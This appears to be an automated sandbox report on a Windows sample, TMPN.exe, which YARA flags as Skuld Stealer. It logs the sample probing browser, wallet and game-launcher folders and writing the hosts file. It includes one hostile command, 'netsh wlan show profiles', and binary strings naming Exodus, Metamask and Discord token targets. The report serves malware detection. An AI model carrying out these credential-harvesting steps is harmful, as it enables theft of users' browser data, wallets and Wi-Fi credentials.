Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public\Epic Games VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public\Minecraft VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\games-user VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Epic Games VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Minecraft VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: \Device\CdRom0\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ImU8tE4J8P VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\TMPN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\Desktop\TMPN.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\Desktop\TMPN.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information

Yara detected Skuld Stealer

Source: Yara match	File source: TMPN.exe, type: SAMPLE
Source: Yara match	File source: 0.0.TMPN.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SecurityHealthSystray.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.SecurityHealthSystray.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SecurityHealthSystray.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TMPN.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.0.SecurityHealthSystray.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.2248250951.0000000001616000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2330525795.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2358971472.0000000001616000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2255354839.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2120936249.0000000000705000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2341077622.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2263686910.0000000001616000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2331278485.0000000001616000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4583102943.0000000001076000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2121587219.0000000001076000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2247151729.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TMPN.exe PID: 2244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecurityHealthSystray.exe PID: 4920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecurityHealthSystray.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: TMPN.exe, 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: %s profiles/invitesBytecoinEthereumElectrum%s\%s\%sCoinbaseCrocobitMetamaskStarcoinProgramsapp.asarGoStringFullPathno anodeCancelIoReadFileAcceptExWSAIoctlshutdownfile[%d]usernameicon_url%s:%d:%sbad instkernel32hijackedNO_ERRORPRIORITYSETTINGSLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflict48828125infinitystrconv.parsing ParseIntcompressEqualSidSetEventIsWindowrecvfromnil PoolscavengepollDesctraceBufdeadlockraceFinipanicnilcgocheckrunnable procid rax rbx rcx rdx rdi rsi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15 rip rflags cs fs gs is not pointer packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes wsaioctlThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqi[::1]:53continue_gatewayinvalid address readfromunixgram
Source: TMPN.exe, 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: - `` - Jaxx%s%sCoreEverMathNamiTrontruefilereadopensyncpipelinkStatquitbindidle.com.exe.bat.cmdUUIDPOSTtext asn1nullbooljson'\''Host<>http1080DATAPINGEtag0x%xdateetagfromhostvaryDategzip%x
Source: TMPN.exe, 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: pacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubdodeltimer0: wrong Ptrace: out of memorywirep: already in gotime: invalid numberJordan Standard TimeArabic Standard TimeIsrael Standard TimeTaipei Standard TimeAzores Standard TimeTurkey Standard TimeEgyptian_HieroglyphsMeroitic_Hieroglyphsinvalid DNS responsegetadaptersaddressesunexpected network: form-data; name="%s"EnterCriticalSectionGetFileAttributesExALeaveCriticalSectionSystemTimeToFileTimeGetSidLengthRequiredenter-recursive-loopnumber has no digitsexpression too largeinvalid repeat countBad chunk length: %dbad palette length: invalid image size: unknown PSK identitycertificate requiredgzip: invalid headerheader line too longx509usefallbackrootsmissing IPv6 addressunexpected characterflate: closed writerzlib: invalid headergetCert can't be nilinvalid UTF-8 stringx509: malformed spkiinvalid integer typeSafeArrayDestroyDataSafeArrayGetElemsizemodulus must be >= 0systemexplorerservicewin32_VideoController-SubmitSamplesConsentcore.asar not in bodyDiscordTokenProtectordiscordtokenprotectorProtectionPayload.dllintegrity_checkmoduleUbisoft Game LauncherTous les utilisateurs\Exodus\exodus.walletreflect.Value.Complextrace/breakpoint trapuser defined signal 1user defined signal 2link has been severedpackage not installedblock device requiredstate not recoverableread-only file systemstale NFS file handleReadDirectoryChangesWNetGetJoinInformationLookupPrivilegeValueWAdjustTokenPrivilegesexec: already startedunsupported operationinternal error: rc %dsequence tag mismatchafter top-level valuein string escape codekey is not comparableclipboard unavailablenot dib format data: bufio: negative counthttp: nil Request.URLUNKNOWN_FRAME_TYPE_%dframe_ping_has_streamRoundTrip failure: %vUnhandled Setting: %vnet/http: nil Contextunknown address type command not supportedPrecondition RequiredInternal Server ErrorWindows Code Page 858186264514923095703125931322574615478515625GetVolumeInformationWEnableCounterForIoctlCM_Get_DevNode_StatusChangeServiceConfig2WDeregisterEventSourceEnumServicesStatusExWGetNamedSecurityInfoWSetNamedSecurityInfoWDwmGetWindowAttributeDwmSetWindowAttributeNtCreateNamedPipeFileSetupDiEnumDeviceInfoSetupUninstallOEMInfWWSALookupServiceNextWWTSEnumerateSessionsWbad type in compare: of unexported methodunexpected value stepreflect.Value.SetZeroreflect.Value.Pointerreflect.Value.SetUintNetUserGetLocalGroupsGetProfilesDirectoryWnegative shift amountconcurrent map writes/gc/heap/allocs:bytesruntime: work.nwait= previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: new
